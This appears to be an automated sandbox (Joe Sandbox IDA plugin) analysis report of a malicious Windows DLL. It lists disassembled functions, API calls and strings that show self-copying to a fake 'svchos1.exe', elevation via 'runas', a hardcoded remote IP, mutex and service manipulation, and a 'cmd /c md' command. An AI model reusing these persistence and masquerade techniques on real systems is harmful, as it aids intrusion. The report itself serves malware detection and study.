100212d8 #825 22026->22008 22027->22008 22027->22026 22029 100212d2 22027->22029 22029->22008 22030->21976 22031->21995 22032->21998 22033->22018 22035 10020f53 CopyFileA 22034->22035 22036 10020f4c 22034->22036 22035->21956 22036->21956

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 1001efd0-1001fa50 #823 lstrcpyA * 11 call 1001b660 * 11 GetCurrentThreadId PostThreadMessageA InitializeSecurityDescriptor SetSecurityDescriptorDacl GetCommandLineA CreateMutexA 25 1001fa63-1001faba 0->25 26 1001fa52-1001fa5d GetLastError 0->26 29 1001fad0-1001fad9 25->29 30 1001fabc-1001faca 25->30 26->25 27 1001fec6-1001fed2 26->27 31 1001fe86-1001fea6 call 1001ab20 29->31 32 1001fadf-1001fae5 29->32 30->29 43 1001feb5 31->43 44 1001fea8-1001feb2 call 1001e440 31->44 33 1001fc40-1001fc46 32->33 34 1001faeb-1001fb05 strstr 32->34 33->27 36 1001fc4c-1001fc92 call 1001e440 33->36 37 1001fb07 34->37 38 1001fb18-1001fb27 call 1001fee0 34->38 36->27 58 1001fc98-1001fd04 sprintf 36->58 41 1001fb0d-1001fb16 Sleep call 1001ef90 37->41 53 1001fbb6-1001fc3a sprintf call 1001e440 call 1001ff30 call 1001ea60 ExitProcess 38->53 54 1001fb2d-1001fb50 38->54 45 1001febb-1001febf Sleep call 1001ef90 43->45 44->43 55 1001fec4 45->55 62 1001fb52-1001fb63 OpenSCManagerA 54->62 63 1001fba5 54->63 55->45 71 1001fe75 58->71 72 1001fd0a-1001fe6f GetModuleFileNameA sprintf Sleep call 1001e800 sprintf call 1001ea60 ExitProcess 58->72 62->63 67 1001fb65-1001fb7d OpenServiceA 62->67 64 1001fbab-1001fbb4 Sleep call 1001ef90 63->64 68 1001fba2-1001fba3 CloseServiceHandle 67->68 69 1001fb7f-1001fb8b StartServiceA 67->69 68->63 75 1001fba0 CloseServiceHandle 69->75 76 1001fb8d-1001fb9a CloseServiceHandle * 2 call 1001ea60 ExitProcess 69->76 77 1001fe7b-1001fe84 Sleep call 1001ef90 71->77 75->68
                                                  APIs
                                                  • #823.MFC42(00000849), ref: 1001EFDF
                                                  • lstrcpyA.KERNEL32(27.124.13.32,00000000), ref: 1001F006
                                                  • lstrcpyA.KERNEL32(1011EAFC,0000012C), ref: 1001F014
                                                  • lstrcpyA.KERNEL32(Default,00000260), ref: 1001F022
                                                  • lstrcpyA.KERNEL32(1.0,00000292), ref: 1001F030
                                                  • lstrcpyA.KERNEL32(1011EC82,000002B2), ref: 1001F03E
                                                  • lstrcpyA.KERNEL32(1011ECE6,00000316), ref: 1001F04C
                                                  • lstrcpyA.KERNEL32(1011ED66,00000396), ref: 1001F05A
                                                  • lstrcpyA.KERNEL32(1011EE66,00000496), ref: 1001F068
                                                  • lstrcpyA.KERNEL32(1011EF78,000005A8), ref: 1001F076
                                                  • lstrcpyA.KERNEL32(1011EFDC,0000060C), ref: 1001F084
                                                  • lstrcpyA.KERNEL32(1011F018,00000648), ref: 1001F092
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • GetCurrentThreadId.KERNEL32 ref: 1001F94E
                                                  • PostThreadMessageA.USER32(00000000,?,?,?,?,?,?), ref: 1001F955
                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?,?), ref: 1001F973
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?), ref: 1001F987
                                                  • GetCommandLineA.KERNEL32 ref: 1001F9B1
                                                  • CreateMutexA.KERNELBASE(?,00000000,00000000), ref: 1001FA43
                                                  • GetLastError.KERNEL32 ref: 1001FA52
                                                  • strstr.MSVCRT ref: 1001FAFA
                                                  • Sleep.KERNEL32(00000032,?,?,?,?,?,?,?,?), ref: 1001FB0F
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00020000), ref: 1001FB59
                                                  • OpenServiceA.ADVAPI32(00000000,1011EC82,00000010), ref: 1001FB6D
                                                  • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 1001FB82
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FB8F
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FB92
                                                  • ExitProcess.KERNEL32 ref: 1001FB9A
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FBA0
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FBA3
                                                  • ExitProcess.KERNEL32 ref: 1001FC3A
                                                  • sprintf.MSVCRT ref: 1001FC05
                                                    • Part of subcall function 1001E440: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,1011EF78,00000000,0000005C), ref: 1001E484
                                                    • Part of subcall function 1001E440: GetLocalTime.KERNEL32(?), ref: 1001E4CE
                                                    • Part of subcall function 1001E440: sprintf.MSVCRT ref: 1001E599
                                                  • Sleep.KERNEL32(00000032), ref: 1001FBAD
                                                    • Part of subcall function 1001EF90: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,75570F00,1001FEC4), ref: 1001EFAF
                                                    • Part of subcall function 1001EF90: CloseHandle.KERNEL32(00000000,?,?,?,?,?,75570F00,1001FEC4,?,?,?,?,?,?,?,?), ref: 1001EFB6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$HandleService$Close$CreateDescriptorExitOpenProcessSecuritySleepThreadsprintf$#823AddressCommandCurrentDaclErrorFileInitializeLastLibraryLineLoadLocalManagerMessageModuleMutexObjectPostProcSingleStartTimeWaitstrstr
                                                  • String ID: -acsi$%$%$%$%$%$%$.$.$1.0$2$2$2$2$27.124.13.32$3$3$A$A$A$A$A$A$A$A$A$A$A$A$A$A$C$C$D$D$D$D$Default$E$E$E$E$F$F$F$F$G$G$G$G$Global\$I$I$K$L$L$M$M$N$P$P$R$S$S$S$S$S$S$S$S$T$V$a$a$a$a$a$a$a$a$a$b$b$c$c$c$c$c$d$d$d$g$g$g$g$g$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$n$n$n$o$o$o$open$p$p$p$p$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$v$v$v$x$y
                                                  • API String ID: 351596864-2051936253
                                                  • Opcode ID: 7cfb272ffc672da6afd5aede38ad53784937d8f556f49564fdb200ff2c99d4ed
                                                  • Instruction ID: e598048d8765cd451969394599f29611a38b066dbb3f57a00738bf0a26127158
                                                  • Opcode Fuzzy Hash: 7cfb272ffc672da6afd5aede38ad53784937d8f556f49564fdb200ff2c99d4ed
                                                  • Instruction Fuzzy Hash: 1B82057050C3C0DDE332C7688848BDFBED5ABA6708F48499DE5CC4A292D7BA5648C767

                                                  Control-flow Graph
                                                  • Function 10014700-1001487f (graph rendered as an image; raw edge dump omitted, see APIs below)
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                  • #823.MFC42(?), ref: 10014763
                                                  • #823.MFC42(?,?), ref: 100147DA
                                                  • RegOpenKeyExA.KERNELBASE(00000000,1011EF78,00000000,00020019,?), ref: 1001487A
                                                    • Part of subcall function 10014C12: RegCloseKey.ADVAPI32(00000000,100149B7), ref: 10014C1C
                                                    • Part of subcall function 10014C12: RegCloseKey.ADVAPI32(?), ref: 10014C25
                                                  • #825.MFC42(?), ref: 10014C2F
                                                  • #825.MFC42(?,?), ref: 10014C38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823#825Close$AddressLibraryLoadOpenProc
                                                  • String ID: %-24s %-$%-24s %-15$'%','-','2','4','s',' ','%','-','1','5','s',' ','0','x','%','x','(','%','d',')',' ','','r','','n','$15s $ADVAPI32.dll$REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$RegOpenKeyExA$[%s]$s %s
                                                  • API String ID: 625772149-2764046103
                                                  • Opcode ID: e9b759d37e0c66c0df496332eaefc290cfeed51a7f80094c371127e5d0bc3a1a
                                                  • Instruction ID: 115d8fe143d75db12af3cc1d4cb921bc2dd74b9ce9cee776de7a3c65cacdb907
                                                  • Opcode Fuzzy Hash: e9b759d37e0c66c0df496332eaefc290cfeed51a7f80094c371127e5d0bc3a1a
                                                  • Instruction Fuzzy Hash: B8E1A0B29005189BDB14CFA8CC84AEFB7B9FB88310F554359F61AA72D0DB759E44CB90

                                                  Control-flow Graph

                                                  APIs
                                                  • _access.MSVCRT ref: 1002141D
                                                    • Part of subcall function 100209D0: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10020A10
                                                    • Part of subcall function 100209D0: CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 10020A25
                                                    • Part of subcall function 100209D0: FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10020A30
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10021449
                                                  • ShellExecuteExA.SHELL32(?), ref: 10021491
                                                  • GetLastError.KERNEL32 ref: 10021497
                                                  • exit.MSVCRT ref: 100214A1
                                                  • _access.MSVCRT ref: 100214D0
                                                  • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 100214ED
                                                  • _access.MSVCRT ref: 100214F6
                                                  • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 10021507
                                                  • Sleep.KERNEL32(000003E8), ref: 1002150E
                                                  • _access.MSVCRT ref: 10021517
                                                  • Sleep.KERNELBASE(000001F4,?,?), ref: 10021526
                                                  • CreateThread.KERNELBASE(00000000,00000000,10020FD0,00000000,00000000,00000000), ref: 10021542
                                                  • CloseHandle.KERNELBASE(00000000), ref: 1002154F
                                                  • CreateThread.KERNELBASE(00000000,00000000,100211C0,00000000,00000000,00000000), ref: 10021560
                                                  • CloseHandle.KERNEL32(00000000), ref: 10021567
                                                  • Shellex.ZFJHEGHDDQ ref: 1002157D
                                                    • Part of subcall function 1001EFD0: #823.MFC42(00000849), ref: 1001EFDF
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(27.124.13.32,00000000), ref: 1001F006
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EAFC,0000012C), ref: 1001F014
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(Default,00000260), ref: 1001F022
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1.0,00000292), ref: 1001F030
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EC82,000002B2), ref: 1001F03E
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011ECE6,00000316), ref: 1001F04C
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011ED66,00000396), ref: 1001F05A
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EE66,00000496), ref: 1001F068
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EF78,000005A8), ref: 1001F076
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EFDC,0000060C), ref: 1001F084
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011F018,00000648), ref: 1001F092
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$_access$CloseCreateExecHandleSleepThread$#823AllocateCheckErrorExecuteFileFreeInitializeLastMembershipModuleNameShellShellexTokenexit
                                                  • String ID: 27.124.13.32$<$C:\Users\Public\Documents\MM$C:\Users\Public\Documents\MM\svchos1.exe$cmd /c md C:\Users\Public\Documents\MM$runas
                                                  • API String ID: 2771109159-2199693279
                                                  • Opcode ID: 57971e8e777e08cc5b984256a566b691be1509acad0c6cfa31ad497dc34f7eb7
                                                  • Instruction ID: fa9292524b20ab7b5a18679751402b284409ad25d9f2df2877a3ef4a3abf2d47
                                                  • Opcode Fuzzy Hash: 57971e8e777e08cc5b984256a566b691be1509acad0c6cfa31ad497dc34f7eb7
                                                  • Instruction Fuzzy Hash: 48313939640315A7F620E778AC81FCE3694EF907A0F940625F759BB1D0DBB4E84046A6

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                    • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                    • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                    • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001ABCC
                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC0A
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC1A
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC2A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC31
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$#823lstrlen$AddressCloseCreateHandleLibraryLoadProcReadSize
                                                  • String ID: C:\ProgramData\Microsoft Drive\Mark.sys$M$T$TGByte\Setup$a$e$i$k$m$r
                                                  • API String ID: 1069036285-2757848780
                                                  • Opcode ID: f2a9626cffd51e9a6d2c40dc870c808525a412725241cf90750e580c4fe7a4f8
                                                  • Instruction ID: 0a72392bf4b0a200e4bd61a90f2bf89fbd88cb95a26b4720dd27f9ac0debc74a
                                                  • Opcode Fuzzy Hash: f2a9626cffd51e9a6d2c40dc870c808525a412725241cf90750e580c4fe7a4f8
                                                  • Instruction Fuzzy Hash: AF31B831108790AFE311CB28CC54B9BBBD9EBC9704F444A1CFA99572D1D7766A04CB66

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 10021410: _access.MSVCRT ref: 1002141D
                                                  • _access.MSVCRT ref: 100214D0
                                                  • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 100214ED
                                                  • _access.MSVCRT ref: 100214F6
                                                  • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 10021507
                                                  • Sleep.KERNEL32(000003E8), ref: 1002150E
                                                  • _access.MSVCRT ref: 10021517
                                                  • Sleep.KERNELBASE(000001F4,?,?), ref: 10021526
                                                  • CreateThread.KERNELBASE(00000000,00000000,10020FD0,00000000,00000000,00000000), ref: 10021542
                                                  • CloseHandle.KERNELBASE(00000000), ref: 1002154F
                                                  • CreateThread.KERNELBASE(00000000,00000000,100211C0,00000000,00000000,00000000), ref: 10021560
                                                  • CloseHandle.KERNEL32(00000000), ref: 10021567
                                                  • Shellex.ZFJHEGHDDQ ref: 1002157D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _access$CloseCreateExecHandleSleepThread$Shellex
                                                  • String ID: 27.124.13.32$C:\Users\Public\Documents\MM$cmd /c md C:\Users\Public\Documents\MM
                                                  • API String ID: 4276510029-3007588180
                                                  • Opcode ID: c1933e08cffc611bd4b2444f6616772dc35ab6b6c909ce2c826781a29803ef26
                                                  • Instruction ID: 452f8436f2e35dc7cd81f777670ae57d519e3dfd0eeeebd5b163114b503f7789
                                                  • Opcode Fuzzy Hash: c1933e08cffc611bd4b2444f6616772dc35ab6b6c909ce2c826781a29803ef26
                                                  • Instruction Fuzzy Hash: 8B11CD39780725B2F530E3B86C82FDE2544DB907A0F650771F7597F1C0DAA4BC4046AA

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,1011EF78,75570F00,0000005C,00000000,00000000,75570F00,1001FEC4), ref: 1002BDDE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002BDE7
                                                  • CreateThread.KERNELBASE(?,?,1002BCB0,?,?,?), ref: 1002BE15
                                                  • LoadLibraryA.KERNEL32(KERNEL32.DLL,WaitForSingleObject,?,?,?,?,?,?,?,?,?), ref: 1002BE27
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002BE2A
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 1002BE3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$CloseCreateHandleThread
                                                  • String ID: CreateEventA$KERNEL32.DLL$KERNEL32.dll$WaitForSingleObject
                                                  • API String ID: 2992130774-1666596002
                                                  • Opcode ID: 5440b0ab951838d2cbe3370a1a700e9c7badd980ebb7237285be3df9d805e187
                                                  • Instruction ID: 8a4cc49f2d02f0bdb3570f0d77f4d2b1bb3eb8ff579d6897090658656d56d732
                                                  • Opcode Fuzzy Hash: 5440b0ab951838d2cbe3370a1a700e9c7badd980ebb7237285be3df9d805e187
                                                  • Instruction Fuzzy Hash: 32110C75608315AFD640DFA88C84F9BBBE8EBC8354F544A0DF698D3351C674E9058BA2

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 10020F30: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10020F42
                                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D14A3D8,1011FA48,?,?,1002152D), ref: 10020F8C
                                                  • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,?,?,1002152D), ref: 10020F93
                                                  • GetLastError.KERNEL32(?,?,1002152D), ref: 10020F9F
                                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D14A3D8,1011FA30,00000000,?,?,1002152D), ref: 10020FB2
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP60(?,?,?,?,1002152D), ref: 10020FBD
                                                  • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,?,?,?,?,1002152D), ref: 10020FC4
                                                  Strings
                                                  • C:\Users\Public\Documents\MM\svchos1.exe, xrefs: 10020F70
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: U?$char_traits@$V?$basic_ostream@$??6std@@?endl@std@@D@std@@@0@D@std@@@1@V10@V21@@$??6?$basic_ostream@D@std@@@std@@ErrorFileLastModuleNameV01@
                                                  • String ID: C:\Users\Public\Documents\MM\svchos1.exe
                                                  • API String ID: 481592904-2345221083
                                                  • Opcode ID: a9c9f4f36b18d4392aaf16a2b8c9324bef32de2e2dd0107f7e80bb18ea79e5d7
                                                  • Instruction ID: 5f12666beba628ea540994bdd3e4d638e6fa14ea03cf00141ba3f8848090bad7
                                                  • Opcode Fuzzy Hash: a9c9f4f36b18d4392aaf16a2b8c9324bef32de2e2dd0107f7e80bb18ea79e5d7
                                                  • Instruction Fuzzy Hash: 23E065B8A503106BE745A7F4AC8D99A3AE8FF5050670C1978FD0EE6161EB39D350D711

                                                  Control-flow Graph
                                                  control_flow_graph 184 10020f30-10020f4a GetModuleFileNameA 185 10020f53-10020f6e CopyFileA 184->185 186 10020f4c-10020f52 184->186
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10020F42
                                                  • CopyFileA.KERNEL32(00000000,?,00000000), ref: 10020F62
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
